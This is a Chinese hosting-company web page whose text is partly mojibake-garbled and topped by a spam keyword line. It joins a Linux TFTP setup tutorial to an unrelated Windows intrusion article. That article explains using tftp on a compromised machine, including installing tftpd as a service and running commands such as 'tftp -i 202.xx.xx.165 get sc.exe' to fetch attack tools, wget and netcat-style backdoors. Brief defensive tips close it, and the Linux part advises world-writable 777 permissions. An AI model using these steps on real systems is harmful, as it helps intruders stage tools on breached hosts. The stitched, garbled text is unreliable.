日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
Linux下的TFTP下載及使用方法(linux的tftp下載)

TFTP是一個(gè)小型的文件傳輸協(xié)議,常用于嵌入式系統(tǒng)、路由器等設(shè)備上進(jìn)行固件更新、配置文件傳輸?shù)热蝿?wù)。在Linux系統(tǒng)中,TFTP作為一個(gè)標(biāo)準(zhǔn)的網(wǎng)絡(luò)協(xié)議得到了廣泛應(yīng)用。本文將介紹在Linux系統(tǒng)中如何進(jìn)行TFTP下載及使用方法。

10年積累的網(wǎng)站設(shè)計(jì)制作、做網(wǎng)站經(jīng)驗(yàn),可以快速應(yīng)對客戶對網(wǎng)站的新想法和需求。提供各種問題對應(yīng)的解決方案。讓選擇我們的客戶得到更好、更有力的網(wǎng)絡(luò)服務(wù)。我雖然不認(rèn)識你,你也不認(rèn)識我。但先網(wǎng)站制作后付款的網(wǎng)站建設(shè)流程,更有龍華免費(fèi)網(wǎng)站建設(shè)讓你可以放心的選擇與我們合作。

一、TFTP安裝

在Debian或Ubuntu系統(tǒng)下,使用以下命令安裝TFTP服務(wù)器:

“`

sudo apt-get install tftp tftpd-hpa

“`

CentOS或Fedora系統(tǒng)下,可以使用以下命令安裝:

“`

sudo yum install tftp tftp-server

“`

二、TFTP配置

1.配置TFTP服務(wù)器

安裝TFTP服務(wù)器后,需要對其進(jìn)行配置。在Debian或Ubuntu系統(tǒng)中,配置文件為/etc/default/tftpd-hpa,打開該文件后,對其中的以下兩行進(jìn)行修改:

“`

TFTP_USERNAME=”tftp”

TFTP_DIRECTORY=”/tftpboot”

“`

其中,TFTP_USERNAME表示TFTP服務(wù)器使用的用戶名,默認(rèn)為“tftp”,不需要修改;TFTP_DIRECTORY表示TFTP服務(wù)器的工作目錄,默認(rèn)為“/srv/tftp”,可以根據(jù)需要進(jìn)行修改,本文以“/tftpboot”為例。修改完成后,保存并退出配置文件。

在CentOS或Fedora系統(tǒng)中,需要修改/etc/xinetd.d/tftp文件。打開該文件后,在service tftp段下方添加以下幾行:

“`

server_args = -c -s /tftpboot

disable = no

“`

其中,“-c”表示允許客戶端向服務(wù)器上傳文件,“-s”表示指定服務(wù)器的工作目錄為“/tftpboot”。修改完成后,保存并退出配置文件。

2.配置文件權(quán)限

TFTP服務(wù)器的工作目錄需要設(shè)置為可寫權(quán)限。在Debian或Ubuntu系統(tǒng)中,可以使用以下命令進(jìn)行設(shè)置:

“`

sudo chown -R nobody:nogroup /tftpboot

sudo chmod -R 777 /tftpboot

“`

在CentOS或Fedora系統(tǒng)中,則需要執(zhí)行以下命令:

“`

sudo chmod -R 777 /tftpboot

sudo chown -R nobody:nobody /tftpboot

“`

此外,在CentOS系統(tǒng)中還需要將SELinux開啟的情況下修改目錄權(quán)限:

“`

sudo chcon -R -t public_content_rw_t /tftpboot

“`

三、TFTP使用

在TFTP服務(wù)器成功配置后,就可以進(jìn)行文件的上傳和下載操作。

1.上傳文件

在Linux系統(tǒng)中,可以使用tftp命令進(jìn)行文件上傳操作。以下命令將上傳本地/var/log/messages文件到TFTP服務(wù)器的/tftpboot目錄下:

“`

tftp server_ip

tftp> put /var/log/messages /tftpboot/messages

“`

其中,server_ip表示TFTP服務(wù)器的IP地址,put表示上傳文件的操作,/var/log/messages是本地文件的路徑,/tftpboot/messages是上傳后的文件路徑。

2.下載文件

同樣地,使用tftp命令可以進(jìn)行文件下載操作。以下命令將下載TFTP服務(wù)器的/tftpboot/pxelinux.0文件到本地/tmp目錄下:

“`

tftp server_ip

tftp> get /tftpboot/pxelinux.0 /tmp/pxelinux.0

“`

其中,get表示下載文件的操作,/tftpboot/pxelinux.0是上傳后的文件路徑,/tmp/pxelinux.0是下載后的文件路徑。

四、TFTP安全

在使用TFTP時(shí)需要注意安全問題。由于TFTP使用的是不加密的明文傳輸,因此數(shù)據(jù)可能會被竊取或篡改。因此,在TFTP使用中需要注意以下幾點(diǎn):

1.不要在TFTP中傳輸敏感數(shù)據(jù),如用戶名、密碼等。

2.使用TFTP時(shí)應(yīng)該在私有網(wǎng)絡(luò)環(huán)境中進(jìn)行。

3.使用TFTP時(shí)應(yīng)該限制訪問,僅允許特定的IP地址訪問。

4.使用TFTP時(shí)應(yīng)該將服務(wù)設(shè)置為只讀模式,僅允許文件上傳至指定目錄,而不允許客戶端向任意目錄進(jìn)行寫入操作。

五、

TFTP是一種小型、高效的文件傳輸協(xié)議,在Linux系統(tǒng)下得到了廣泛應(yīng)用。我們可以通過安裝配置TFTP服務(wù)器來實(shí)現(xiàn)文件上傳和下載等操作。同時(shí),在使用TFTP時(shí)也需要注意安全問題,僅在私有網(wǎng)絡(luò)中進(jìn)行,并限制訪問和只讀操作。

相關(guān)問題拓展閱讀:

  • 如何安裝RED HAT LINUX的tftp服務(wù)器呢?

如何安裝RED HAT LINUX的tftp服務(wù)器呢?

Tftp安裝使用全接觸

發(fā)表日期:2023年10月8日

菜鳥A通過時(shí)下比較流行的webdav漏洞進(jìn)行溢出攻擊得到了一個(gè)shell,但是在加了管理員帳戶后他卻發(fā)現(xiàn)發(fā)現(xiàn)建立了管理員帳戶之后卻不能ipc$連接,在cmd下又不能開啟ipc$,提示啟動錯(cuò)誤。那么怎么上傳文件呢?菜鳥聽人說過可以用ftp,但是由于cmd環(huán)境下ftp是不能實(shí)現(xiàn)交互的,所以這樣反而會害了人,輸入ftp后,cmd停在那里不動了?菜鳥傻眼了;也有人說是用echo命令寫一個(gè)從指定ftp下載程序的文件,然后通過ftp –s:file命令來下載,這個(gè)通過實(shí)踐是可行的,但是菜鳥又覺得有點(diǎn)麻煩渣山。怎么辦?

這時(shí),一個(gè)聲音在耳邊響起:用tftp吧,給你快樂。Tftp?!@#$^&*,菜鳥想了一會,不得其解。聽說過ftp,那tftp又是什么呢?那么今天我就給菜鳥們講解下它的安裝使用過程以及在入侵中的作用和自己的心則梁蔽得體會。

一. TFTP簡介:

Tftp是Trivial File Transfer Protocol的簡稱,翻譯為簡單文件傳輸協(xié)議,它是TCP/IP協(xié)議族中的一個(gè)用來在客戶機(jī)與服務(wù)器之間進(jìn)行簡單文件傳輸?shù)膮f(xié)議,雖然功能有點(diǎn)少,但是在我們的入侵中幫助還是很大的。

Tftp與Win2K自帶的Ftp服務(wù)器和目前流行的Serv-u所不同的是Tftp是承載在UDP端口;與Ftp相比,TFTP的大小要小的多;缺陷是它提供的數(shù)據(jù)流傳輸服務(wù)是不可靠的,它不提供存取授權(quán)與認(rèn)證機(jī)制,使用超時(shí)重傳方式來保證數(shù)據(jù)的到達(dá),使用的是UDP 69端口。但是由于它采用的是UDP端口,很容易擺脫防火墻的限制和IP安全策略對端口的審核,可以在入侵的時(shí)候靈活的使用,這也就是我向大家介紹它的原因了。

二:TFTP服務(wù)的開啟:

也許你還記得經(jīng)典的unicode漏洞,利用這個(gè)漏洞可以在瀏覽器里執(zhí)行命令,可以通過tftp上傳idq.dll,然后結(jié)合ispc.exe來獲取管理員權(quán)限。但是你知道tftp服務(wù)器不是很容易找的,但是話又說回來了,既然Tftp.exe是微軟自帶的一個(gè)比較可愛的小工具,那么我們就可以利用它來做點(diǎn)事,為肉雞開啟Tftp服務(wù),那就不用愁著找不到tftp服務(wù)器了。我們可以在Win2k的Winnt\system32下找到Tftp.exe,還可以在WINNT\system32\dllcache下找到Tftp.exe。當(dāng)然你可以在命令行下輸入:dir %windir%\tftp* /s(表示在%windir%目錄所有子目錄搜索tftp前綴程序)。我的機(jī)子反饋的信息是這樣的:

驅(qū)動器 C 中的卷沒有標(biāo)簽。卷的序列號是 287C-D610

C:\WINNT\system32 的目錄

:05 17,680 tftp.exe

1 個(gè)文件 17,680 字節(jié)

C:\WINNT\system32\dllcache 的目錄

:05 17,680 tftp.exe

:00 19,728 tftpd.exe

2 個(gè)文件 37,408 字節(jié)

大家也看到了,這里出現(xiàn)了一個(gè)Tftpd.exe程孫州序,沒有錯(cuò),它是tftp服務(wù)器的服務(wù)端程序。怎么開啟肉雞的tftp服務(wù)呢,雙擊運(yùn)行?-install?這里我們需要ResourceKit里的一個(gè)工具instsrv.exe把tftp安裝為服務(wù),instsrv是命令行下的工具,srvinstw.exe是它的gui版本,看圖

1:我們來看它的說明:

C:\Longker>instsrv.exe

Installs and removes system services from NT

INSTSRV ( | REMOVE)

Install service example:

INSTSRV MyService C:\MyDir\DiskService.Exe

-OR-

INSTSRV MyService C:\mailsrv\mailsrv.exe -a MYDOMAIN\joebob -p foo

Remove service example:

INSTSRV MyService REMOVE

那我們就把tftp安裝為服務(wù):

C:\Longker>instsrv “Tftp services” c:\winnt\system32\dllcache\tftpd.exe

The service was successfuly added!

Make sure that you go into the Control Panel and use

the Services applet to change the Account Name and

Password that this newly installed service will use

for its Security Context.

就這樣,我們把tftp服務(wù)安裝上了,服務(wù)名是Tftp services,下面來啟動它:

C:\Longker>net start “tftp services”

Tftp services 服務(wù)正在啟動。

Tftp services 服務(wù)已經(jīng)啟動成功。

OK,服務(wù)已經(jīng)啟動成功了,我們可以用fport來查看端口開啟的情況:

1524 tftpd -> 69 UDP c:\winnt\system32\dllcache\tftpd.exe

看到了,它是采用UDP協(xié)議來進(jìn)行文件傳輸?shù)?,開啟的端口是69。

或者我們可以用以下命令來查詢:

C:\Longker >netstat -an |find “69”

netstat -an |find “69”

UDP 202.xx.xx.165:69 *:*

服務(wù)啟動成功后,會在系統(tǒng)跟目錄下生成tftpdroot文件夾,我們上傳和提供下載的文件就放在這里。

這里有一個(gè)很好的Tftp服務(wù)器推薦給大家,有日志記錄和目錄設(shè)定功能,還顯示傳輸進(jìn)度,最重要的是它是免費(fèi)的,而且可以在多個(gè)平臺使用

下載地址

三:如何使用Tftp:

TFTP 自帶的幫助信息:

TFTP host source

-i Specifies binary image transfer mode (also called

octet). In binary image mode the file is moved

literally, byte by byte. Use this mode when transferring binary files.

host Specifies the local or remote host.

GET Transfers the file destination on the remote host to

the file source on the local host.

PUT Transfers the file source on the local host to

the file destination on the remote host.

source Specifies the file to transfer.

destination Specifies where to transfer the file.

說明:

-i選項(xiàng)是以二進(jìn)制模式傳送文件,很多Exploit代碼就需要用這種模式來傳送。

Host是開啟了tftp服務(wù)的主機(jī),可以是本地主機(jī)也可以是遠(yuǎn)程主機(jī)。

get就是到當(dāng)前運(yùn)行的目錄里面下載,而put就是把文件上傳到了開了tftp服務(wù)的機(jī)子。Source是你要上傳或者是下載的文件名稱。

下面舉幾個(gè)列子:

C:\Longker>tftp -i 202.xx.xx.165 get sc.exe

tftp -i 202.xx.xx.165 get sc.exe

Transfer successful:bytes in 1 second,bytes/s

這個(gè)是從開了tftp服務(wù)的主機(jī)下載sc.exe程序,速度不錯(cuò)吧 :)

C:\Longker>tftp -i 202.xx.xx.165 put sc.exe

tftp -i 202.xx.xx.165 put sc.exe

Transfer successful:bytes in 1 second,bytes/s

上面是把sc.exe上傳到tftp服務(wù)器。

四:相關(guān)問題解答:

由于tftp是微軟自帶的,所以我們?nèi)肭至艘慌_機(jī)子后,可以使用它來上傳我們所要用到的工具,而不用下載其他的工具了。那么剛才菜鳥的問題也就迎刃而解了,我們可以用tftp下載我們需要的工具,或者是只用tftp下載wget.exe(一個(gè)可以從web服務(wù)器下載程序的小型工具),然后用wget下載自己實(shí)現(xiàn)準(zhǔn)備好的工具包。

前面的問題是解決了,但是或許菜鳥還會遇到些問題,比如要把上傳的文件刪除的時(shí)候卻出現(xiàn)了錯(cuò)誤提示:拒絕訪問!怎么回事?我自己上傳的文件卻不能刪除,太假了。那是因?yàn)橛胻ftp上傳下載的文件默認(rèn)是具有只讀屬性的,所以我們在刪除前需要用attrib –R 來去掉它的只讀屬性。

大家也知道,很多網(wǎng)絡(luò)蠕蟲或黑客攻擊程序都嘗試通過某種漏洞獲得命令行的運(yùn)行權(quán)限,而這些獲得權(quán)限的過程中,蠕蟲往往是通過Windows自帶的tftp客戶端程序去獲取一些需要的攻擊程序或后門程序,如nc之類的工具。較新的比如是現(xiàn)在熱門的asp木馬,也可以利用cmd.asp調(diào)用tftp來下載工具,進(jìn)而獲取系統(tǒng)管理員權(quán)限。注重安全的讀者也許會問,那萬一我的機(jī)子也被入侵了,怎么了防止入侵者使用tftp呢?我這里介紹兩種方法給大家。

1:可以用cacls來限制用戶對程序的訪問

C:\>cacls

顯示或者修改文件的訪問控制表(ACL)

CACLS filename >

> >

filename 顯示 ACL。

/T 更改當(dāng)前目錄及其所有子目錄中指定文件的 ACL。

/E 編輯 ACL 而不替換。

/C 在出現(xiàn)拒絕訪問錯(cuò)誤時(shí)繼續(xù)。

/G user:perm 賦予指定用戶訪問權(quán)限。

Perm 可以是: R 讀取W 寫入C 更改(寫入) F 完全控制

/R user 撤銷指定用戶的訪問權(quán)限(僅在與 /E 一起使用時(shí)合法)。

/P user:perm 替換指定用戶的訪問權(quán)限。

Perm 可以是: N 無R 讀取W 寫入C 更改(寫入) F 完全控制

/D user 拒絕指定用戶的訪問。

在命令中可以使用通配符指定多個(gè)文件。也可以在命令中指定多個(gè)用戶。

相關(guān)幫助信息如上,那我們可以禁止iusr_computername用戶對tftp.exe的運(yùn)行權(quán)限。

C:\>cacls c:\winnt\system32\tftp.exe /D iusr_computername

C:\>cacls c:\winnt\system32\dllcache\tftp.exe /D iusr_computername

是否確定(Y/N)?y

處理的文件: c:\winnt\system32\tftp.exe

處理的文件: c:\winnt\system32\dllcache\tftp.exe

C:\>tftp

拒絕訪問。

顯然我們達(dá)到了我們的目的。類似的我們可以禁止iusr用戶對cmd.exe的調(diào)用。

2:我們能不能把tftp刪除以絕后患呢?不行,因?yàn)樵赪IN2K下,tftp.exe之類的系統(tǒng)關(guān)鍵程序受到Windows File Protection系統(tǒng)的保護(hù),無法直接更改。這里我們介紹另外一種方法,

用文本編輯工具打開%systemroot%\system32\drivers\etc下的service文件找到對應(yīng)的tftp那一行:

bootps 67/udp dhcps #Bootstrap Protocol Server

bootpc 68/udp dhcpc #Bootstrap Protocol Client

tftp 69/udp #Trivial File Transfer

將 69/udp 替換成 0/udp保存退出。我們再嘗試看看能否使用tftp了?

關(guān)于linux的tftp下載的介紹到此就結(jié)束了,不知道你從中找到你需要的信息了嗎 ?如果你還想了解更多這方面的信息,記得收藏關(guān)注本站。

香港服務(wù)器選創(chuàng)新互聯(lián),2H2G首月10元開通。
創(chuàng)新互聯(lián)(www.cdcxhl.com)互聯(lián)網(wǎng)服務(wù)提供商,擁有超過10年的服務(wù)器租用、服務(wù)器托管、云服務(wù)器、虛擬主機(jī)、網(wǎng)站系統(tǒng)開發(fā)經(jīng)驗(yàn)。專業(yè)提供云主機(jī)、虛擬主機(jī)、域名注冊、VPS主機(jī)、云服務(wù)器、香港云服務(wù)器、免備案服務(wù)器等。


網(wǎng)站欄目:Linux下的TFTP下載及使用方法(linux的tftp下載)
文章鏈接:http://www.dlmjj.cn/article/dpsjdis.html